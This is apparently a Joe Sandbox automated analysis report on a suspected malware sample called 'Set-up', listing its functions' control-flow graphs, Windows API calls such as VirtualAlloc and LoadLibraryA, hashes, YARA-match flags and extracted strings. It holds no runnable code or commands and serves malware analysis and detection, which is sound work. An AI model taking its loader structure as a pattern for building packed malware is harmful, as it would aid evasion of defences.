                                                                                                                                                  control_flow_graph 665 6cf09f-6cf0b2 666 6cf0ca-6cf0d4 665->666 667 6cf0b4-6cf0b7 665->667 669 6cf0d6-6cf0de 666->669 670 6cf0e3-6cf0ef 666->670 668 6cf0b9-6cf0bc 667->668 668->666 671 6cf0be-6cf0c8 668->671 669->670 672 6cf0f2-6cf0f7 670->672 671->666 671->668 673 6cf0f9-6cf104 672->673 674 6cf12a-6cf131 LoadLibraryA 672->674 676 6cf106-6cf11e call 6cf76d 673->676 677 6cf120-6cf124 673->677 675 6cf134-6cf138 674->675 676->677 681 6cf139-6cf13b 676->681 677->672 679 6cf126-6cf128 677->679 679->674 679->675 681->675
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(00000000,?,?), ref: 006CF131
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                  • String ID: .dll
                                                                                                                                                  • API String ID: 1029625771-2738580789
                                                                                                                                                  • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                  • Instruction ID: 23103d41616cde8422cf5140f4d82fe0692d6aed273fa31e97705a7fab317f79
                                                                                                                                                  • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                  • Instruction Fuzzy Hash: 9521E136600295CFEB21DFA9D854FBA7BA6EF05720F1841BDD8018BB42D730EC468790
                                                                                                                                                  Function 0046E5E6 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 682 46e5e6-46e604 HeapCreate 683 46e606-46e613 call 46e49e 682->683 684 46e63c-46e63e 682->684 687 46e615-46e620 call 46e643 683->687 688 46e622-46e625 683->688 694 46e62c-46e62e 687->694 690 46e627 call 46f18a 688->690 691 46e63f-46e642 688->691 690->694 694->691 695 46e630-46e636 HeapDestroy 694->695 695->684
                                                                                                                                                  APIs
                                                                                                                                                  • HeapCreate.KERNEL32(00000000,00001000,00000000,0046D3B2,00000001), ref: 0046E5F7
                                                                                                                                                    • Part of subcall function 0046E49E: GetVersionExA.KERNEL32 ref: 0046E4BD
                                                                                                                                                  • HeapDestroy.KERNEL32 ref: 0046E636
                                                                                                                                                    • Part of subcall function 0046E643: HeapAlloc.KERNEL32(00000000,00000140,0046E61F,000003F8), ref: 0046E650
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$AllocCreateDestroyVersion
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2507506473-0
                                                                                                                                                  • Opcode ID: d603912bc11666b8604e5a30b1ee863587e4eb47df06f1985380e2fb4d6e7b3c
                                                                                                                                                  • Instruction ID: 2c44f73e526f15872983c8da3a0ff1853e759ea84cc28b5b3cde1596803d7061
                                                                                                                                                  • Opcode Fuzzy Hash: d603912bc11666b8604e5a30b1ee863587e4eb47df06f1985380e2fb4d6e7b3c
                                                                                                                                                  • Instruction Fuzzy Hash: 84F06D78650301AEEF206B32EC0576A36D8EB74785FA4447BF405C91E1FBA88981D91F
                                                                                                                                                  Function 006CDCF1 Relevance: 2.8, APIs: 2, Instructions: 325memoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 696 6cdcf1-6cdd55 call 6cf298 * 3 703 6cdd7f 696->703 704 6cdd57-6cdd59 696->704 705 6cdd82-6cdd8c 703->705 704->703 706 6cdd5b-6cdd5d 704->706 706->703 707 6cdd5f-6cdd71 VirtualAlloc 706->707 708 6cdd8d-6cddb0 call 6cf70d call 6cf731 707->708 709 6cdd73-6cdd7a 707->709 715 6cddfa-6cde13 call 6cf298 708->715 716 6cddb2-6cdde8 call 6cf405 call 6cf2db 708->716 709->703 710 6cdd7c 709->710 710->703 715->703 721 6cde19 715->721 727 6cddee-6cddf4 716->727 728 6ce049-6ce052 716->728 723 6cde1f-6cde25 721->723 725 6cde27-6cde2d 723->725 726 6cde61-6cde6a 723->726 729 6cde2f-6cde32 725->729 730 6cde6c-6cde72 726->730 731 6cdec3-6cdece 726->731 727->715 727->728 732 6ce059-6ce061 728->732 733 6ce054-6ce057 728->733 738 6cde34-6cde39 729->738 739 6cde46-6cde48 729->739 740 6cde76-6cde91 call 6cf298 730->740 736 6cdee7-6cdeea 731->736 737 6cded0-6cded9 call 6ccfe5 731->737 734 6ce090 732->734 735 6ce063-6ce08e call 6cf731 732->735 733->732 733->734 743 6ce094-6ce0b4 call 6cf731 VirtualFree 734->743 735->743 747 6ce045 736->747 748 6cdef0-6cdef9 736->748 737->747 759 6cdedf-6cdee5 737->759 738->739 745 6cde3b-6cde44 738->745 739->726 746 6cde4a-6cde58 call 6cf09f 739->746 756 6cdeb0-6cdec1 740->756 757 6cde93-6cde9b 740->757 767 6ce0ba-6ce0bc 743->767 768 6ce0b6 743->768 745->729 745->739 760 6cde5d-6cde5f 746->760 747->728 754 6cdeff-6cdf06 748->754 755 6cdefb 748->755 761 6cdf08-6cdf11 call 6cce81 754->761 762 6cdf36-6cdf3a 754->762 755->754 756->731 756->740 757->747 763 6cdea1-6cdeaa 757->763 759->754 760->723 773 6cdf1f-6cdf28 call 6ccf7c 761->773 774 6cdf13-6cdf19 761->774 765 6cdfdc-6cdfdf 762->765 766 6cdf40-6cdf62 762->766 763->747 763->756 771 6ce031-6ce033 call 6ce421 765->771 772 6cdfe1-6cdfe4 765->772 766->747 782 6cdf68-6cdf7b call 6cf70d 766->782 767->705 768->767 781 6ce038-6ce039 771->781 772->771 775 6cdfe6-6cdfe9 772->775 773->762 789 6cdf2a-6cdf30 773->789 774->747 774->773 779 6cdfeb-6cdfed 775->779 780 6ce002-6ce013 call 6cdae2 775->780 779->780 785 6cdfef-6cdff2 779->785 794 6ce024-6ce02f call 6cd5ae 780->794 795 6ce015-6ce021 call 6ce0c1 780->795 786 6ce03a-6ce041 781->786 797 6cdf7d-6cdf81 782->797 798 6cdf9f-6cdfd8 782->798 790 6cdff9-6ce000 call 6cec8f 785->790 791 6cdff4-6cdff7 785->791 786->747 792 6ce043 786->792 789->747 789->762 790->781 791->786 791->790 792->792 794->781 795->794 797->798 802 6cdf83-6cdf86 797->802 798->747 808 6cdfda 798->808 802->765 806 6cdf88-6cdf9d call 6cf510 802->806 806->808 808->765
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006CDD6B
                                                                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 006CE0AF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$AllocFree
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2087232378-0
                                                                                                                                                  • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                  • Instruction ID: 5df2e5441773848d232c7b1699cd2d9af9eec1b0c14540a6a89445eaf2fbd564
                                                                                                                                                  • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                  • Instruction Fuzzy Hash: 18B1C271600A02ABDB219F608C81FFBB7FAFF19310F14052DE55986241E776E961DBA2
                                                                                                                                                  Function 0046C433 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 810 46c433-46c45e 811 46c4a3-46c4a6 810->811 812 46c460-46c469 810->812 813 46c502-46c507 811->813 815 46c4a8-46c4ad 811->815 812->813 814 46c46f-46c493 call 46e0ea call 46e9df call 46c49a 812->814 817 46c50c-46c511 813->817 818 46c509-46c50b 813->818 814->813 835 46c495 814->835 819 46c4b7-46c4b9 815->819 820 46c4af-46c4b5 815->820 823 46c512-46c51a RtlAllocateHeap 817->823 818->817 821 46c4ba-46c4c3 819->821 820->821 824 46c4c5-46c4f1 call 46e0ea call 46f482 call 46c4f9 821->824 825 46c4f3-46c4f4 821->825 827 46c520-46c52e 823->827 824->825 824->827 825->823 835->827
                                                                                                                                                  APIs
                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 0046C51A
                                                                                                                                                    • Part of subcall function 0046E0EA: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0046FAC9,00000009,00000000,00000000,00000001,0046DF28,00000001,00000074,?,?,00000000,00000001), ref: 0046E127
                                                                                                                                                    • Part of subcall function 0046E0EA: EnterCriticalSection.KERNEL32(?,?,?,0046FAC9,00000009,00000000,00000000,00000001,0046DF28,00000001,00000074,?,?,00000000,00000001), ref: 0046E142
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1616793339-0
                                                                                                                                                  • Opcode ID: 771cf43559ff06f1ebc52e5c48213047d5676d2a2eb7c08bb624c5770d819d52
                                                                                                                                                  • Instruction ID: f3a81f82fab732f328402414ab5915954d68b1eb2c82511a8fab8306750961e3
                                                                                                                                                  • Opcode Fuzzy Hash: 771cf43559ff06f1ebc52e5c48213047d5676d2a2eb7c08bb624c5770d819d52
                                                                                                                                                  • Instruction Fuzzy Hash: 6E21BB71A00215ABDB10EF69DC82BBE77A4FB04764F20412BF455EB2D0E77CE941865E

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 0069340E Relevance: 108.3, Strings: 85, Instructions: 2003COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: !$"$%$%$&$'$($($*$+$,$,$,$,$-$-$-$.$.$.$/$0$1$7$8$8$;$;$;$>$A$B$B$C$C$D$D$D$E$F$G$G$H$M$N$N$O$P$P$R$R$T$V$Y$Y$[$[$[$\$\$]$_$_$`$`$a$b$c$d$d$e$e$g$h$j$k$l$n$n$p$w$|$}$}$~
                                                                                                                                                  • API String ID: 0-2269815469
                                                                                                                                                  • Opcode ID: e45e94bb91484452e74b7a520612be77690e753eeaadf04d74f9b2aa9941fc8d
                                                                                                                                                  • Instruction ID: 669540c889eb5b13069ccdfddba1a0904fa8044e3ae22519e2c8b1136bb67ebb
                                                                                                                                                  • Opcode Fuzzy Hash: e45e94bb91484452e74b7a520612be77690e753eeaadf04d74f9b2aa9941fc8d
                                                                                                                                                  • Instruction Fuzzy Hash: 0A13EF7150C7C08BC7359B3884843AFBBE2AB96320F188A6DE4E9877D2C7798546C757
                                                                                                                                                  Function 006B7F48 Relevance: 75.4, Strings: 60, Instructions: 383COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1298 6b7f48-6b830c 1299 6b830e-6b8313 1298->1299 1300 6b8387-6b83c0 1299->1300 1301 6b8315-6b8385 1299->1301 1302 6b83c2-6b83c5 1300->1302 1301->1299 1303 6b83de-6b8448 1302->1303 1304 6b83c7-6b83dc 1302->1304 1305 6b844a-6b844d 1303->1305 1304->1302 1306 6b844f-6b8474 1305->1306 1307 6b8476-6b84a4 1305->1307 1306->1305 1308 6b84a6-6b84a9 1307->1308 1309 6b84ab-6b84c0 1308->1309 1310 6b84c2-6b851e 1308->1310 1309->1308 1311 6b8520-6b8523 1310->1311 1312 6b8557-6b857c 1311->1312 1313 6b8525-6b8555 1311->1313 1314 6b857e-6b8581 1312->1314 1313->1311 1315 6b85a3-6b85a6 1314->1315 1316 6b8583-6b85a1 1314->1316 1317 6b85a8-6b85ae 1315->1317 1316->1314 1318 6b85b0 1317->1318 1319 6b85b5-6b85c7 1317->1319 1322 6b863a-6b8670 1318->1322 1320 6b85cb-6b85d1 1319->1320 1321 6b85c9 1319->1321 1323 6b862b-6b862e 1320->1323 1324 6b85d3-6b8628 call 6be37e 1320->1324 1321->1323 1326 6b8632-6b8635 1323->1326 1327 6b8630 1323->1327 1324->1323 1326->1317 1327->1322
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $!$!$#$$$%$%$&$'$'$($)$*$*$+$+$+$,$-$-$.$/$/$/$2$4$4$5$9$;$=$=$?$?$D$D$M$M$N$U$W$^$_$_$_$a$c$c$d$e$j$j$l$n$p$q$r$z${$~
                                                                                                                                                  • API String ID: 0-1920404844
                                                                                                                                                  • Opcode ID: fdad7be40413645a41994a0a0e15cc09c6db28694e98fe9671e9f6630e224268
                                                                                                                                                  • Instruction ID: 591ef4b17c4b656917b376c054e393819602738d01f8921373430e04b0aeb949
                                                                                                                                                  • Opcode Fuzzy Hash: fdad7be40413645a41994a0a0e15cc09c6db28694e98fe9671e9f6630e224268
                                                                                                                                                  • Instruction Fuzzy Hash: 6C2222219087EA8DDB36C63C8C087DDBE615B63324F0843D9D1E96B2D2D7750A86CB66
                                                                                                                                                  Function 004032C9 Relevance: 41.4, APIs: 3, Strings: 20, Instructions: 1154COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004032CE
                                                                                                                                                  • SetFileApisToOEM.KERNEL32 ref: 004032DC
                                                                                                                                                  • GetCommandLineW.KERNEL32(00000004), ref: 004032F9
                                                                                                                                                    • Part of subcall function 00406319: __EH_prolog.LIBCMT ref: 0040631E
                                                                                                                                                    • Part of subcall function 0046BBC0: RaiseException.KERNEL32(?,?,R@,?,?,?,0047D380,?,?,?,004052E0), ref: 0046BBEE
                                                                                                                                                    • Part of subcall function 0040738F: __EH_prolog.LIBCMT ref: 00407394
                                                                                                                                                    • Part of subcall function 00408FB2: __EH_prolog.LIBCMT ref: 00408FB7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog$ApisCommandExceptionFileLineRaise
                                                                                                                                                  • String ID: Decoding Error$Error:$ : $ file$----------------$Archive Errors: $Archives: $CRC: $Codecs:$Compressed: $Error: $Errors: $Files: $Folders: $Formats:$Size: $Sub items Errors: $WARNING: Cannot find $WARNING: Cannot open $WARNINGS for files:
                                                                                                                                                  • API String ID: 3088770371-689937231
                                                                                                                                                  • Opcode ID: fcb4a9625959cc3be28d0aeddeeac708d92c70676f50eb999fe907713720a31c
                                                                                                                                                  • Instruction ID: 41a247c36ea81c5163d4481a6cebf84b1dcafa3efb08149c349de198b751cea6
                                                                                                                                                  • Opcode Fuzzy Hash: fcb4a9625959cc3be28d0aeddeeac708d92c70676f50eb999fe907713720a31c
                                                                                                                                                  • Instruction Fuzzy Hash: F7A2A070D042199BDF14EBA5C899BEEBBB5AF45308F1040BFE405B72C2DB785A44CB5A
                                                                                                                                                  Function 006B72D3 Relevance: 40.3, Strings: 32, Instructions: 297COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 2130 6b72d3-6b7425 2131 6b7427-6b742a 2130->2131 2132 6b745e-6b749b 2131->2132 2133 6b742c-6b745c 2131->2133 2134 6b749d-6b74a0 2132->2134 2133->2131 2135 6b74b9-6b7523 2134->2135 2136 6b74a2-6b74b7 2134->2136 2137 6b7525-6b7528 2135->2137 2136->2134 2138 6b752a-6b7565 2137->2138 2139 6b7567-6b7595 2137->2139 2138->2137 2140 6b7597-6b759a 2139->2140 2141 6b759c-6b75b1 2140->2141 2142 6b75b3-6b760f 2140->2142 2141->2140 2143 6b7611-6b7614 2142->2143 2144 6b7658-6b7677 2143->2144 2145 6b7616-6b7656 2143->2145 2146 6b7679-6b767c 2144->2146 2145->2143 2147 6b769e-6b76a1 2146->2147 2148 6b767e-6b769c 2146->2148 2149 6b76a3-6b76a9 2147->2149 2148->2146 2150 6b76ab 2149->2150 2151 6b76b0-6b76c2 2149->2151 2152 6b7735-6b775a 2150->2152 2153 6b76c6-6b76cc 2151->2153 2154 6b76c4 2151->2154 2155 6b7726-6b7729 2153->2155 2156 6b76ce-6b7723 call 6be37e 2153->2156 2154->2155 2158 6b772b 2155->2158 2159 6b772d-6b7730 2155->2159 2156->2155 2158->2152 2159->2149
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 0$0$0$2$2$3$4$4$6$6$8$:$<$<$>$>$Q$`$a$b$d$f$h$j$l$n$s$z${$|$}$~
                                                                                                                                                  • API String ID: 0-876831194
                                                                                                                                                  • Opcode ID: bbe4ec4a255a3f98e1cd5822909672a01be13502a7264827bf40e526fdf13f75
                                                                                                                                                  • Instruction ID: be180d5f8d8f9151850531fd3683c1bdd0a275f8383a28fa4f8b6c3759c234cb
                                                                                                                                                  • Opcode Fuzzy Hash: bbe4ec4a255a3f98e1cd5822909672a01be13502a7264827bf40e526fdf13f75
                                                                                                                                                  • Instruction Fuzzy Hash: B2E1B221D087E98EDB22C67C88043DDBFB15B53324F0842DDD4E9AB3D2D6754A86CB66
                                                                                                                                                  Function 004185FE Relevance: 21.7, APIs: 1, Strings: 11, Instructions: 710COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: !$000$001$R$Unknown error$a$exe$iso$r$rar$wR@
                                                                                                                                                  • API String ID: 3519838083-283078084
                                                                                                                                                  • Opcode ID: 2ab122cc93271be7a269a58e2ea853c288add0570733aacf28cc4cd3a81a773b
                                                                                                                                                  • Instruction ID: 559301500c5c599910b2af14fbdd2b456b682ead41d4de31ff4558aa113e3007
                                                                                                                                                  • Opcode Fuzzy Hash: 2ab122cc93271be7a269a58e2ea853c288add0570733aacf28cc4cd3a81a773b
                                                                                                                                                  • Instruction Fuzzy Hash: 9352A070D00248DFCF15DF95C8849EEBBB5BF49314F24805EE845AB291DB38AA85CB65
                                                                                                                                                  Function 004415D2 Relevance: 20.4, APIs: 10, Strings: 1, Instructions: 1179COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004415D7
                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000,00000004,00000004,00010000,?,00000001), ref: 00441E42
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00441EAC
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00441EF0
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 004423AD
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00442460
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 004424FF
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$Leave$EnterH_prolog
                                                                                                                                                  • String ID: D
                                                                                                                                                  • API String ID: 2532973370-2746444292
                                                                                                                                                  • Opcode ID: c7c2732c37a64ada520d63ac1eee0b237546949b15254c05d830259176227b0d
                                                                                                                                                  • Instruction ID: 744c9ab89cf9137cc2ef17180ac8af806b2d9bec3cba67278ea5f98f0c2327ee
                                                                                                                                                  • Opcode Fuzzy Hash: c7c2732c37a64ada520d63ac1eee0b237546949b15254c05d830259176227b0d
                                                                                                                                                  • Instruction Fuzzy Hash: 1EC28F30D00249DFEF15DFA5C994AEDBBB0AF18308F54809EE44977292DB786E49CB25
                                                                                                                                                  Function 00690E8D Relevance: 17.2, Strings: 13, Instructions: 950COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
